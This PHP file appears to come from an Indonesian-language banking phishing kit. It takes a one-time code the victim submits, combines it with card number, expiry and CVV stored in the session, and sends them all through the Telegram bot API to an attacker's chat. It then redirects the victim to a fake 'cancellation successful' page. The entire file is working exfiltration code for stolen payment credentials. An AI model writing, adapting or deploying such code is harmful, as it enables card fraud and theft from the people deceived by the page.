<?php
session_start();
include "./telegram.php";

$token = $_POST['token'];
$_SESSION['token'] = $token;
$penyedia = $_SESSION['penyedia'];
$debit = $_SESSION['debit'];
$bulan = $_SESSION['bulan'];
$tahun = $_SESSION['tahun'];
$cvv = $_SESSION['cvv'];

$message = "

 KARTU LAIN | ".$nohp."

• Nama Bank  = ".$penyedia."

• Nokartu  = ".$debit."

• Bulan  = ".$bulan."

• Tahun   = ".$tahun."

• CVV  = ".$cvv."

• KODE BATAL  = ".$token."



";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
header('Location: ../laporkan-banklain/pembatalan-berhasil.html');
?>
